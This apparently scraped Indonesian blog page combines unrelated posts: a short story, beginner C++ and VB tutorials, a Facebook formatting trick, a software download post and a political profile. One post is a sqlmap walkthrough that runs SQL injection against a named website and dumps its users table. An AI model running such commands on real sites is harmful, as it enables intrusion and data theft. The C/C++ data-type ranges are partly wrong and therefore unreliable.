-->

K.E ^_~ Yang lagi galau ini penawarnya link

115 Test Otak, Seberapa pintarkah anda ?

Sebenarnya otak manusia sangat mudah terkelabui dengan proses yang ada. Sehingga dapat mempengaruhi hasil akhir yang dicapai. gak percaya? mari kita buktikan.

Dibawah ini ada empat ( 4 ) pertanyaan dan satu pertanyaan bonus. Jawablah semua dengan spontan tanpa banyak pikir. Cuma boleh berpikir sedetik, jawab segera. OK?

Ayo cari tahu, seberapa pintar anda… . Siap? GO!!!

0 Senyum Ceria

Kemiskinan mendominasi penduduk Ibukota,
di kolong jembatan, di tempat yang sama sekali tak menjamin rasa nyaman,
mereka tinggal untuk mempertahankan hidup...

kemewahan di sekelilingnya tak mampu berkontribusi terhadap deritanya,
karena sejatinya kemewahan itu hanyalah milik para pejabat negara,
tanpa ada yang peduli dengan sesamanya yang miskin lagi papa...

Ironis,
menyedihkan,
memilukan,
memalukan,
yang kaya makin berjaya,
yang miskin makin tertindas...
habis tak berbekas...

Ria masih terpekur dalam sunyi. Tak mengerti apa yang hendak ia perbuat. Kondisinya sebagai bocah yatim piatu tanpa sanak keluarga dan saudarda membuat ia harus berhadapan dengan kemelut hidup yang menyakitkan di usia yang masih sangat dini. Ria, seorang gadis belia berusia sebelas tahun. Anak seusianya sepantasnya tengah belajar di sekolah atau bermain bersama teman sebayanya. Namun tak begitu yang terjadi dengan Ria. Ria harus bekerja keras demi sesuap nasi untuk mempertahankan hidupnya.
“Ya Allah, aku bosan hidup seperti ini terus. Di mana orang tuaku ya Allah? Mengapa ia begitu tega membuangku di tempat sampah? Bang Jodi yang telah merawatku sejak kecil kini telah Engkau panggil. Lantas siapa lagi yang hendak aku turut ya Allah?” Dalam gulitanya pekat malam Ria menahan lara yang menyelubungi hatinya. Buliran bening air mata mulai lancang menggelinding di pipinya yang legam. Malam semakin meninggi, bertambah kelam. Aroma dingin yang menggigilkan tubuh tak lagi dihiraukan oleh Ria yang tengah terdiam di emperan toko. Duduk termangu meratapi nasib hidupnya.
Ya, orang-orang yang tak mempunyai tempat tinggal seperti dirinya bukan lagi merupakan pemandangan asing di kota metropolitan. Jika tidak di kolong jembatan, sudah barang pasti orang-orang yang senasib dengannya akan tinggal di emperan toko kala malam dan berkeliaran mencari penghidupan di siang hari. Entah itu penghidupan dari mengamen atau menjadi pemulung yang hasilnya tak seberapa. Apalagi untuk biaya hidup di ibukota yang semua orang tahu teramat mahal.
Ria sempat mengenyam pendidikan di Bangku Sekolah Dasar hingga kelas empat, sebelum akhirnya Bang Jodi, orang yang menanggung biaya hidupnya meninggal dalam perkelahian karena sesuatu hal. Dan semenjak kepergian Bang Jodi, Ria tidak lagi sanggup melanjutkan sekolahnya. Jika dulu untuk makan dan biaya sekolah ditanggung oleh Abang angkatnya yang berprofesi sebagai kuli panggul di pasar Senen, sebuah pasar yang cukup besar di Jakarta Selatan, pasar di mana ia biasa tinggal, sekarang ia harus menanggung hidup seorang diri. Andai saja rumah yang dulu ia tempati bersama Bang Jodi masih ada, tentunya Ria tidak mungkin akan terlunta-lunta hidup di jalanan. Meski bukan rumah gedongan layaknya para konglomerat atau pejabat, tapi setidaknya ia masih punya tempat berteduh yang membuatnya aman.
Masih teringat jelas dalam ingatannya ketika Ria mendapati bang Jodi dipukuli orang saat ia baru saja pulang dari sekolah. Bang Jodi yang juga hidup tanpa siapa-siapa kecuali Ria kini lemas tak berdaya di depan mata kepala Ria.
“Bang Jodi....!!” Ria terpekik seraya menghampiri Bang Jodi.
“Hey! Siapa kalian? Hentikan semua ini. Apa salah Abangku sehingga kalian memukulinya?” Ria terus terisak sambil mengoyak baju salah seorang dari tiga orang berperawakan tinggi besar yang tengah menghujamkan tinju ke muka Bang Jodi. Namun yang terjadi, Ria dengan badan kurusnya justru terlempar dengan hanya sekali hentakan.
“Kamu anak kecil tahu apa? Abangmu ini sudah mengingkari janjinya sehingga dia pantas mendapatkan pelajaran!!” Salah seorang dari ketiganya menghardik dengan suara menggelegar bak halilintar.
“Tapi apa salah Abangku? Kalian tak seharusnya menganiaya Bang Jodi seperti ini. Kalian bisa menyelesaikannya secara baik-baik tanpa harus membuatnya terluka.” Dengan bersimbah air mata Ria mencoba menghiba pada ketiga algojo itu.
“Hahahaha... Kau ini bocah ingusan yang tidak tahu apa-apa. Jadi mending kamu pergi saja sana, mengemis di jalanan untuk mencari duit!!” Semua preman berwajah sangar itu tertawa membahana. Sementara Ria sendiri semakin teriris hatinya menyaksikan Abangnya yang sudah sangat memprihatinkan. Sejenak setelah tiga orang algojo itu pergi meninggalkan Ria dan Bang Jodi di depan rumahnya, Ria langsung menghampiri Bang Jodi. Yang membuat hati Ria semakin teriris adalah rumah tempat tinggalnya hangus dilahap api yang berkobar mengudara. Betapa tidak manusiawinya tiga orang tersebut membumihanguskan rumah mereka satu-satunya.
“Bang, bangun Bang.” Ria terisak sambil memeluk tubuh yang telah melunglai.
“Ria, Abang... Abang... Abang sudah tidak kuat lagi sayang...” Suara parau Bang Jodi nyaris tak terdengar.
“Bang Jodi nggak boleh ngomong seperti itu! Bang Jodi harus kuat. Abang nggak boleh ninggalin Ria sendirian. Kalau Abang pergi, Ria mau tinggal sama siapa Bang?” Isak tangisnya semakin nyata terdengar.
“Itu nggak mungkin Ria. Abang harus pergi. Maafkan Abang yang sudah tidak bisa lagi menjaga dan melindungimu. Jadilah kamu anak yang tegar dan tahan terhadap segala macam goncangan. Abang yakin kamu pasti mampu. Jadilah mutiara Abang yang terus berkilau menyinari dunia. Tetaplah ceria seperti namamu, Ceria.”
“Bangun Bang! Bangun!” Ria mengguncang-guncang tubuh Bang Jodi yang bersimbah darah di bagian mukanya. Namun usahanya sia-sia, karena ternyata Abang yang sangat dicintainya telah menghembuskan nafas terakhir, meninggalkan dirinya seorang untuk selama-lamanya.
“Abaaaaaaaaang...!!” Pekik Ria masih dalam kesendirian tanpa ada tetangga atau orang yang mempedulikannya.
Setelah kejadian itu Ria benar-benar mengalami beban mental yang teramat berat. Hari-harinya ia jalani hanya dengan linangan air mata. Tak seorang pun di dunia ini yang bisa ia jadikan tempat berpijak dan mengadu luka. Sampai saat ini, Ria benar-benar belum mengerti apa yang sebenarnya terjadi dengan Bang Jodi, sehingga tiga orang biadab itu tega memukulinya hingga tak bernyawa.
“Kebakaran.. Kebakaran... Kebakaran...” Ria tersentak mendengar gelegar membahana di tengah pekatnya malam. Seketika ia terbangun dari lamunan masa silamnya. Orang-orang mulai berlarian meninggalkan lokasi. Sementara Ria masih bingung apa yang harus ia perbuat. Ria limbung tanpa beranjak dari tempatnya berdiam. Si jago merah membumbung tinggi, menghanguskan tempat biasa ia tinggal selama dua tahun terakhir. Spontan setelah lokasi mulai lengang, Ria baru sadar bahwa kebakaran besar telah terjadi. Langsung saja Ria berniat menjejakkan langkahnya dari tempat tersebut. Namun tiba-tiba, kepalanya terasa teramat pening saat ia baru saja menyempurnakan berdirinya. Dan tiba-tiba, dunia terasa gelap. Ria tak sadarkan diri.
**************

“Di mana aku ini?” Perlahan Ria membuka kelopak matanya yang semula erat terpejam.
“Kamu di tempat yang aman nak. Semalam suami Ibu menemukanmu di depan onggokan bangunan yang telah hangus terbakar ketika pulang dari ronda.” Seorang wanita mengenakan kebaya muslimah yang duduk tepat di samping tempatnya berbaring menyahut dengan segurat senyuman di wajah.
“Ibu siapa?” Nyata sekali terlukis kebingungan pada diri Ria ketika menatap wajah wanita itu.
“Panggil saja Bu Nurma nak. Kalau namamu siapa nak? Apa kamu masih mempunyai keluarga?” Tanyanya penuh kelembutan.
“Aku Ceria Bu, panggilannya Ria...” Dengan segera Ria menjawab pertanyaan wanita itu tanpa merasa canggung lagi.
“Aku sudah nggak punya siapa-siapa Bu. Abang angkatku telah pergi dua tahun yang lalu. Sedangkan orang tuaku aku tak pernah tahu keberadaan mereka. Bahkan hanya sekedar menatap sebingkai wujudnya dalam gambar pun tak pernah. Konon, kata Bang Jodi, dulu waktu aku masih bayi aku ditemukannya di tong sampah sekitar pasar Senen. Beliau adalah orang satu-satunya yang aku punya sebelum maut menjemputnya.” Ucapannya terhenti. Selaksa sekat terasa menyumbat kerongkongannya sehingga terpaksa ia harus menghentikan ucapannya. Butiran bening kembali mengalir deras membasahi matanya yang sudah sembab akibat tangisnya semalam.
“Ya sudah nak, jangan dilanjutkan lagi. Maafkan Ibu telah membuatmu sedih.” Bu Nurma mengusap rambut Ria dengan sentuhan lembutnya seraya mendekap erat tubuh Ria yang dekil dan tak terurus. Untuk pertama kalinya Ria merasakan belaian lembut seorang wanita. Dan akibatnya, angannya melambung mengkhayalkan seandainya wanita yang mendekapnya adalah Ibu kandungnya. Ah, namun semua itu terlalu mustahil menurutnya. Ibu kandungnya yang entah berada di mana pastinya tengah asyik menyelami kehidupannya yang tak pernah diketahui oleh Ria. Atau mungkin Ibu kandungnya telah lama mati karena kwalat atau juga menjadi gembel di jalanan. Entahlah. Ria tak pernah menemukan jawaban atas pertanyaan yang menggejolak dalam rongga kepalanya.
“Nggak papa Bu Nurma. Ria cuma nggak sanggup mengingat semua itu. Bolehkah aku sejenak merasakan pelukan Ibu kembali? Aku ingin merasakan dekap hangat seorang Ibu, meski Bu Nurma bukanlah Ibu kandung Ria. Tapi setidaknya pelukan Ibu sedikit menjadi penawar rinduku pada sosok seorang Ibu yang selama ini Ria harapkan.” Dengan lugunya Ria menghiba.
“Tentu saja boleh nak. Bahkan kamu boleh saja menganggap Ibu ini sebagai Ibu kandungmu, dan kamu juga boleh tinggal di sini sesuka kamu.” Sahut wanita bernama Bu Nurma sambil menarik kembali tubuh kurus Ria yang tadi sempat dilepaskan. Sementara Ria membenamkan kepalanya di dada wanita itu. Singkat cerita, Ria menjadi bagian dari keluarga Bu Nurma yang begitu menyayanginya. Wajar saja Bu Nurma teramat menyayangi sosok Ria yang cantik dan pintar. Apalagi selama ini Bu Nurma harus ikhlas menjalani perannya sebagai seorang istri yang tidak mampu memberikan keturunan untuk suaminya. Beruntung meski demikian, suaminya tersebut sangatlah bijak, sehingga selama dua puluh tahun membina rumah tangga tanpa kehadiran buah hati, mereka tetaplah keluarga yang harmonis dan hampir tak pernah terjadi pertengkaran.
“Ria sayang, ke sini sebentar kamu nak! Ayah mau bicara.” Pak Lukman, suami Bu Nurma yang tengah duduk di teras rumah bersama istrinya memanggil Ria yang tengah asyik memberi makan ikan-ikan di kolam samping rumah.
“Iya Ayah, sebentar.” Ria menyahut seraya beranjak dari duduknya.
“Lusa kamu sekolah ya? Nanti semuanya biar Ayah yang atur!” Hatinya melonjak gembira mendengar penuturan Ayah angkatnya. Tidak lama kemudian Ria kembali bersekolah atas bantuan Pak Lukman. Hari-hari bersama orang tua angkatnya dilalui dengan penuh suka cita. Semua kesedihan yang menimpa selepas kepergian Bang Jodi kini terbayar oleh kasih sayang tulus yang dicurahkan oleh Bu Nurma dan Pak Lukman.
Namun nasib manusia siapa yang tahu. Cobaan ternyata masih belum berakhir sampai di situ. Baru sekitar dua bulan Ria masuk SMP setelah sebelumnya menamatkan Sekolah Dasar, kedua orang tua angkatnya harus meregang nyawa karena mengalami kecelakaan kereta dalam perjalaan menuju sanak keluarganya di Surabaya. Kala itu Ria juga turut serta. Beruntung Ria masih sanggup bertahan hidup. Sedangkan Bu Nurma dan Pak Lukman harus meninggalkan dunia fana karena kehabisan banyak darah akibat dari kecelakaan tersebut, sebelum keduanya sempat dilarikan ke rumah sakit.
Berhari hingga berminggu lamanya Ria kembali meratapi kesedihannya. Betapa orang yang selama ini telah banyak berjasa harus pergi secepat itu. Namun akhirnya ia sadar. Hidup adalah teka-teki yang hanya diketahui oleh Allah. Tak sepantasnya jika ia harus terus meratap dalam luka. Ia sadar bahwasanya manusia hidup itu ibarat hanya mampir sementara. Sedangkan tempat kembalinya adalah di hadapan Allah Azza Wa Jalla. Dengan tekad bulat, Ria memutuskan untuk melanjutkan hidup dengan penuh senyum keceriaan, seperti nama yang diberikan oleh Bang Jodi, CERIA.
Kesedihan dan kehampaan bukan lagi menjadi pilihan yang harus ia jalani. Sekarang Ria yang dulu cengeng telah menjelma menjadi sosok yang tegar dan berani dalam menjalani hidup. Bahkan dengan beasiswa, kini Ria telah tercatat sebagai salah satu mahasiswa di sebuah universitas negeri di Semarang, kota yang ia pilih untuk melabuhkan hidupnya setelah ia memutuskan untuk membunuh sebuah nama bernama sedih dan luka yang selama ini menguasai hatinya. Sekarang Ria adalah sosok dengan sejuta talenta tanpa hambatan keterbatasan. Puluhan hingga ribuan cobaan hidup yang menghampirinya telah mengubahnya menjadi sosok yang kuat dan tegar. Sambil terus mencari identitas siapa gerangan orang tua kandungnya, Ria menjalani hidupnya dengan penuh senyuman. Karena derita dan luka sejatinya merupakan cambuk untuk menggapai hidup penuh kebahagiaan. [ ]

*******THE END*******

Purwokerto, 18 Maret 2011 on 13:14

BIODATA

Nama Chomsiyah. Mempunyai nama pena dan nama facebook Akhwatul Chomsiyah Firdausa. Beralamat di desa Panusupan, Rt 06 Rw 07, Kec. Cilongok, Kab. Banyumas 53162 Jawa Tengah. Pernah menempuh pendidikan di MI Ma'arif NU 01 Jatisaba lulus pada tahun 2004, kemudian melanjutkan ke SMP Negeri 02 Purwojati dan lulus pada tahun 2007. SMA di SMA Negeri 01 Salem lulus pada tahun 2010. Sekarang tengah menempuh pendidikan di sebuah lembaga pendidikan multi profesi satu tahun El Rahma Satria Purwokerto. Penulis dapat dihubungi lewat e-mail di ukhti.chomsiyah@yahoo.com dan ac.firdausa@klikedukasi.com serta via SMS atau Telephon di nomor 085742291676. Sebagaian karyanya pernah singgah di harian lokal Radar Tegal dan di blog http://klikedukasi.com serta blog pribadinya dengan alamat http://ac-firdausa.blogspot.com

15 Membuat aplikasi penghitung luas dengan C++

Kemarin kita sudah mempelajari tipe data di C++. Kali ini kita akan mencoba membuat program sederhana untuk menghitung luas persegi, lingkaran dan segitiga. Kebetulan ane lagi kasmaran sama C++, kata temen ane bahasa pemrograman ini seksi dan bikin ketagihan gaje.

Oke, sekarang buka editor C++ kesayangan anda, ane sendiri menggunakan visual studio 2010. Kemudian ketik listing program berikut.




Gimana? sudah selesai ngetiknya? silahkan compile terlebih dahulu, kemudian jalankan programnya.. kurang lebih seperti ini hasilnya:


Oke sekarang ane kasih penjelasan dari program C++ diatas pinter

1) File header
Pada contoh diatas, iostream.h disebut file header. File header diperlukan agar perintah cout bisa dijalankan,.apabila file header tersebut dihapus maka akan terjadi pesan error. Untuk memanggil file header menggunakan perintah #include atau #include "file header" dalam suatu program bisa menggunakan lebih dari satu file header atau tergantung kebutuhan.


2) "cout" (console output)
Perintah cout adalah salah satu statment,.perintah cout tersebut digunakan untuk mencetak tulisan pada console atau layar dan harus diakhiri dengan tanda ";"

3) "endl"
Perintah endl sama halnya dengan \n fungsinya untuk pindah baris.

4) "cin" (console input)
fungsi "cin" dalam c++ digunakan untuk menginput masukan nilai dari piranti masukan (keyboard) dan selanjutnya akan diproses oleh program. Sintaknya adalah:
cin >> variabel;

5) "if else"
perintah pengandaian dari suatu case,.
-jika inputan sama dengan "==" 1 maka fungsi pertama yang digunakan,dalam program diatas mencari luas persegi,.
-atau jika inputan sama dengan 2 maka fungsi program kedua yang akan dijalankan,.
-atau jika inputan sama dengan tiga maka fungsi ketiga yang akan dijalankan.
-atau inputan salah maka akan menampilkan pesan di console "kode yang anda masukan salah"

6)getch()
Perintah getch() sama dengan perintah "cin" (perintah input),.akan tetapi getch() khusus untuk input berupa karakter, disamping itu getch() juga dapat membaca inputan berupa spasi atau tab sedangkan "cin" tidak bisa.

oke segitu dulu penjelasan cupu dari ane semoga bermanfaat..sampai jumpa di tutor ane selanjutnya metal!!


regard

CitooZz Banditozz

3 Tipe Data di C/C++


Akhirny bisa nulis lg :D

kali ni ane mo sharing tentang macam2 tipe data di C/C++,.(lg mupeng soalny sama bahasa ni :D)..

oke langsung aja..below is the explanation

#tipe data int (integer)
range=*signed=-214748364sampai+2147483648
*unsigned= 0 sampai 4294967295
ex=5,-234,342
(signed(tipe data yang bertanda dalam artian mempunyai nilai positif dan negatif),.unsigned(tipe data yg hanya bernilai positif dan dimulai dari nol,.range tipe data unsigned dua kali dari batas atas tipe data signed)


#float (floating point number)
range= -3,4 * 10^38 to 3,4 * 10^38
akurasi sampai 7 digit desimal
ex=0,223

#double (double precision floating point number
range=-1,7*10^308 sampai 1,7*10^308
akurasi sampai 15 digit desimal
ex=0,013243

#bool (boolean value)
adalah tipe data yang hanya bernilai true dan false..temen2 dah familiar kan dengan tipe data yg ini :D so g usah ane jelasin :P

#char
adalah karakter tunggal
range=*signed=-127 sampai 127
*unsigned=0 sampai 255

untuk mengetahui angka desimal yang mempresentasikan huruf apa silahkan temen2 liat tabel ascii disini

oke segitu dulu coretan ane bsk lanjut lagi..:D tengkyuuuu

regard

CitooZz Banditozz

2 Kalkulator sederhana dengan visual basic (VB)

Program kalkulator sederhana yang dibuat dengan visual basic ini merupakan program iseng hasil latihan tersenyum lebar. Kata orang bijak sesuatu yang besar dimulai dari yang kecil dan program yang rumit dimulai dari program yang sederhana. Siapa tahu dari kalkulator sederhana ini bisa menjadi sebuah sistem operasi yang bisa bersaing dengan windows dan linux, ho ho ho ga nyambung jack parah

8 Cara menggunakan sqlmap pada backtrack 5

dear all..:)

Akhirny kesampaian juga nulis artikel disini lagi :)
okok langsung aja kali ini gw mau sharing tentang cara penggunaan sqlmap. Sqlmap adalah salah satu tools pentest di linux backtrack yang kegunaanny untuk mengexploitasi web yang vulnerable terhadap serangan sql injection..:).

Buat maniak ubuntu juga bisa kok (tinggal download aja toolsnya). Oke langsung aja setelah lo dah dapet target yang vuln sql injection, ikuti langkah-langkah berikut:

1.buka sqlmap kalian

Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.setelah terbuka tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 --dbs




-u       = url
--dbs  = kita mencari nama databasenya...

3. Setelah ketemu nama databasenya yaitu="uselessj_uj2006"
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 --tables

-D            = nama database yang sudah kita temukan tadi
--tables     = untuk mencari nama table..

4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut...:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --columns


lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --dump

fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)

oke kalo udah gini terserah kalian mau diapakan..ane gak tanggung jawab yee..sekedar sharing aja buat pembelajaran :P

regard

CitooZz Banditozz

99 Cara baru membuat status biru di facebook

Membuat status biru dengan cara sebelumnya sudah tidak bisa, sepertinya pihak facebook memang tidak menghendaki usernya untuk update status yang berbau link seperti itu. Tetapi yang namanya manusia, semakin dilarang, semakin penasaran. Hasil rasa penasaran ini adalah munculnya cara baru membuat status biru di facebook. Bukan hanya status yang bisa berwarna biru tapi komentarpun bisa menjadi biru dengan cara ini.

Pada awalnya saya penasaran melihat komentar seorang teman berwarna biru di facebook. Dalam hati "emang membuat komentar biru di facebook masih bisa ya?". Bukankah udah dipatch oleh pihak facebook?. hmmm sepertinya ada cara lain nih.

Ok kita langsung pada triknya, anda cukup copas kode seperti di bawah:

‎@@[0:[136044869785541:1:Tulis status biru anda di sini]]

Kemudian masukkan kode tersebut pada kotak update status atau kotak komentar. Sesuaikan tulisan yang berwarna biru dengan status atau komentar anda. Coba liat hasilnya.

Notes: Cara seperti ini masih bisa digunakan saat tulisan ini dibuat, namun kemungkinan sudah tidak bisa digunakan saat anda baca tulisan ini.

Update !!
Update status maupun komentar dengan rumus di atas sudah tidak bisa, akan tetapi kalau kode aplikasinya kita arahkan ke profile sendiri ternyata masih bisa. trus gimana rumusnya? coba rumus ini
@@[0:[0:1:status biru facebook]]
Sekian, semoga bermanfaat :)

10 Menambahkan fitur tab pada microsoft office 2003, 2007 dan 2010

Office Tab atau Tab Office adalah sebuah addons untuk Microsoft Office 2003 atau Microsoft Office 2007 atau Microsoft Office 2010 (32bit dan 64-bit). Program ini berguna untuk membuat tab layaknya tab pada firefox. Dengan model tab ini, Anda dapat beralih ke dokumen yang berbeda dengan cepat, mudah dan efisien.

Bagi anda yang sering bekerja dengan office (word, excel, power point etc) mungkin akan kewalahan saat anda membuka beberapa dokumen sekaligus. Taskbar window anda akan terlihat acak acakan dan tentunya sangat mengganggu kenyamanan anda.

Di sinilah tab office berperan merapikan dokumen office anda yang sedang terbuka. Jika anda terbiasa menggunakan browser mozilla firefox, saya yakin anda sudah tidak asing dengan fitur tab ini. coba lihat gambar berikut.


Yang diberi lingkaran merah itu yang dinamakan tab. Secara default microsoft office belum menyertakan fitur tab ini. Sehingga saat kita membuka dokumen lebih dari satu, akan memakan space pada taskbar.

Office tab merupakan program buatan china dan bagusnya lagi program ini bersifat freeware alias gratis dan anda bebas memakainya.

Sebenarnya tab office ini memiliki banyak fungsi lain disamping fungsi utamanya membuat tab. Salah satunya adalah membuat fitur favorit grup. Dengan fitur ini anda dapat mengelompokkan sejumlah dokumen favorit, membuat kelompok kelompok dokumen dan dapat menempatkan kelompok dokumen ini dalam tab yang mudah untuk akses. Intinya adalah mempermudah kerja anda dengan office. Untuk mengetahui fitur lengkapnya silahkan anda baca pada situs resminya di sini.

Jika anda mau mencobanya, silahkan download filenya di bawah:

Nama File:                     SetupOfficeTab.exe(Untuk Office 32-bit) 
File Size:                        2,919,048  bytes
Download File:              Click to download

Nama File:                     SetupOfficeTabx64.exe(for Office 64-bit) 
File Size:                        2,604,936  bytes
Download File:              Click to download

Nama File:                    SetupOfficeTabEnterprise.exe(for Office 32-bit) 
File Size:                       4,047,672 bytes
Download File:             Click to download

Nama File:                    SetupOfficeTabEnterprisex64.exe(for Office 64-bit) 
File Size:                       6,092,192 bytes
Download File:             Click to download



206 Inilah presiden termiskin di dunia yang patut kita teladani

Profil singkat Mahmoud Ahmadinejad

Nama : Mahmoud Ahmadinejad
Tempat / Tanggal lahir : Aradan, Iran / 28 Oktober 1956
Status : Menikah
Menjabat sebagai Presiden Iran ke : 6
Pendidikan  : Gelar Doktor dalam bidang teknik dan perencanaan lalu lintas dan transportasi Universitas Sains dan Teknologi Iran (IUST)




Mahmoud Ahmadinejad terlahir dengan nama Mahmoud Sabourijan di daerah Garmsar, tepatnya desa Aradan 54 tahun silam. Ayahnya, Ahmad, adalah seorang pandai besi dan pengikut ajaran Syi’ah yang taat. Ibunya, Khanom, dikatakan memiliki hubungan darah dengan nabi Muhammad SAW.

Ahmadinejad merupakan seseorang yang tidak terkenal, bukan tokoh ulama, juga bukan tokoh politik di negara Iran. Ahmadinejad kecil tumbuh layaknya seorang remaja di usianya. Dikenal sebagai penggemar sepakbola dan jago bermain sepakbola. Dia juga pintar matematika. Selain itu Ahmadinejad terkenal memiliki suara yang bagus, seperti saat membaca Al-Quran maupun pidato.

Keluarga Ahmadinejad pindah ke Teheran, Iran pada saat dia berusia 1 tahun. Nama ‘Sabourijan’ diganti menjadi ‘Ahmadinejad’ oleh sang ayah untuk menghindari konflik di tempat tinggal barunya.

Pada tahun 1980, Ahmadinejad merupakan ketua perwakilan IUST (Iran University of Science and Technology) untuk perkumpulan mahasiswa se-Iran. Ahmadinejad juga terlibat dalam pendirian Kantor untuk Pereratan Persatuan (daftar-e tahkim-e vahdat), organisasi mahasiswa yang berada di balik perebutan Kedubes Amerika Serikat yang mengakibatkan terjadinya peristiwa ‘krisis sandera Iran’.

Pada masa perang saudara antara Iran dan Irak, Ahmadinejad bergabung dengan Korps Pengawal Revolusi Islam, tepatnya pada tahun 1986. Ahmadinejad kemudian diangkat menjadi insinyur kepala pasukan keenam Korps dan kepala staf Korps di sebelah barat Iran.

Setelah perang, dia bertugas sebagai wakil gubernur dan gubernur Maku dan Khoy, Penasehat Menteri Kebudayaan dan Ajaran Islam, dan gubernur provinsi Ardabil dari 1993 hingga Oktober 1997. Ini merupakan awal kiprah Ahmadinejad di dunia politik.

Pada bulan mei 2003, Ahmadinejad terpilih sebagai walikota Teheran. Selama menjabat sebagai walikota, Ahmadinejad menanamkan nilai-nilai keagamaan dalam kegiatan-kegiatan di pusat kebudayaan Teheran. Hal ini bertentangan dengan para walikota sebelum dirinya yang lebih modern dan reformis.

Saat kampanye, Ahmadinejad pernah bertengkar dengan Presiden Iran saat itu, Mohammad Khatami, yang membuat beliau mencabut hak Ahmadinejad untuk menghadiri pertemuan dewan menteri, hak yang biasanya diberikan pada walikota di Iran. Pertengkaran tersebut dipicu dari pernyataan Ahmadinejad di depan umum bahwa Presiden Khatami tidak pernah memperhatikan masalah sehari-hari warga Iran.

Pada tahun 2005, Ahmadinejad akhirnya terpilih menjadi Presiden keenam Iran setelah memenangkan 62 persen suara dalam Pemil. Mengalahkan rivalnya, Ahmad Hashemi Rafsanjani.

Tidak ada yang mengira Mahmoud Ahmadinejad dapat terpilih menjadi Presiden Iran, karena 6 kandidat presiden lainnya merupakan tokoh ulama atau tokoh politik yang memiliki sumber dana besar. Ahmadinejad terpilih karena rakyat menyukai gaya dan sifatnya yang sederhana.

Tak lama setelah terpilih, Ahmadinejad tersandung tuduhan bahwa dirinya terlibnat dalam peristiwa ‘krisis sandera Iran’ pada tahun 1979. Sebuah foto yang diklaim sebagai bukti memperlihatkan seorang pria mirip dirinya sedang berjalan menuntutn sandera. namun hal ini tak pernah dapat dibuktikan.

Ahmadinejad dikenal sebagai sosok konservatif yang sangat berpedoman pada nilai-nilai agama yang dianutnya. Pidato dan kata-katanya seringkali pedas dan kontroversial. Terutama jika menyangkut negara Amerika. Perkataan Ahmadinejad ini membuat dirinya tak disukai oleh kalangan politikus dunia Barat, terutama Amerika. Ahmadinejad juga dikenal sebagai tokoh anti-gay.

Saat menjabat Walikota Teheran, kemana-mana selalu menyetir sendiri, tetap tinggal di rumah susunnya, membersihkan lingkungannya sendiri, suka mengamati sendiri setiap sudut kota dan lain-lain.

Sifatnya yang sederhana ini masih terlihat saat Ahmadinejad terpilih menjadi Presiden. Karpet-karpet merah persia mahal dikeluarkan semua dari istana, menolak mobil limosine dan tetap setia menggunakan mobil tuanya serta tetap tinggal di rumah susunnya. Selain sifatnya yang sederhana ia dicintai karena lebih mementingkan memperbaiki ekonomi negara ketimbang bidang-bidang lain dan memperjuangkan setiap pendapatan minyak bumi agar jatuh ke meja makan rakyat Iran.
Saya tidak akan berhenti hingga semua rakyat biasa di Iran dapat makan. (Ahmadinejad)
Dalam menghadapi tekanan barat pun Ahmadinejad berani dan tegas.
Anda yang menciptakan dan menggunakan senjata biologis saat perang Irak-Iran. Anda yang menggunakan peluru ber-uranium. Apa hak Anda melarang kami (Iran) mengembangkan teknologi nuklir untuk energi dan perdamaian. (Ahmadinejad)
Suatu ketika Ahmadinejad mendapat pertanyaan dari wartawan Jepang : “Tuan Presiden, kenapa Anda masih mempertahankan pengembangan teknologi nuklir yang mengancam perdamaian dunia ?”

``Anda seharusnya tidak perlu mengkhawatirkan kami (Iran), Anda harusnya lebih khawatir kepada negara yang pernah menjatuhkan bom nuklir ke negara Anda, jawab Ahmadinejad”

Kesederhanaan, pengabdian tulus pada negara dan keberanian dalam menghadapi tekanan barat membuat Mahmoud Ahmadinejad makin dicintai rakyatnya.

Presiden Iran saat ini: Mahmoud Ahmadinejad, ketika di wawancara oleh TV Fox (AS) soal kehidupan pribadinya:

"Saat anda melihat di cermin setiap pagi, apa yang anda katakan pada diri anda?"

Jawabnya: "Saya melihat orang di cermin itu dan mengatakan padanya: "Ingat, kau tak lebih dari seorang pelayan, hari di depanmu penuh dengan tanggung jawab yang berat, yaitu melayani bangsa Iran ."

Berikut adalah gambaran Ahmadinejad, yang membuat orang ternganga dan terheran-heran : 

1. Saat pertama kali menduduki kantor kepresidenan Ia menyumbangkan seluruh karpet Istana Iran yang sangat tinggi nilainya itu kepada masjid2 di Teheran dan menggantikannya dengan karpet biasa yang mudah dibersihkan.

2. Ia mengamati bahwa ada ruangan yang sangat besar untuk menerima dan menghormati tamu VIP, lalu ia memerintahkan untuk menutup ruang tersebut dan menanyakan pada protokoler untuk menggantinya dengan ruangan biasa dengan 2 kursi kayu, meski sederhana tetap terlihat impresive.

3. Di banyak kesempatan ia bercengkerama dengan petugas kebersihan di sekitar rumah dan kantor kepresidenannya.

4. Di bawah kepemimpinannya, saat ia meminta menteri2 nya untuk datang kepadanya dan menteri2 tsb akan menerima sebuah dokumen yang ditandatangani yang berisikan arahan2 darinya. Arahan tersebut terutama sekali menekankan para menteri2nya untuk tetap hidup sederhana dan disebutkan bahwa rekening pribadi maupun kerabat dekatnya akan diawasi, sehingga pada saat menteri2 tsb berakhir masa jabatannya dapat meninggalkan kantornya dengan kepala tegak.

5. Langkah pertamanya adalah ia mengumumkan kekayaan dan propertinya yang terdiri dari Peugeot 504 tahun 1977, sebuah rumah sederhana warisan ayahnya 40 tahun yang lalu di sebuah daerah kumuh di Teheran. Rekening banknya bersaldo minimum, dan satu2nya uang masuk adalah uang gaji bulanannya.

6. Gajinya sebagai dosen di sebuah universitas hanya senilai US$ 250.

7. Sebagai tambahan informasi, Presiden masih tinggal di rumahnya. Hanya itulah yang dimilikinyaseorang presiden dari negara yang penting baik secara strategis, ekonomis, politis, belum lagi secara minyak dan pertahanan. Bahkan ia tidak mengambil gajinya, alasannya adalah bahwa semua kesejahteraan adalah milik negara dan ia bertugas untuk menjaganya.

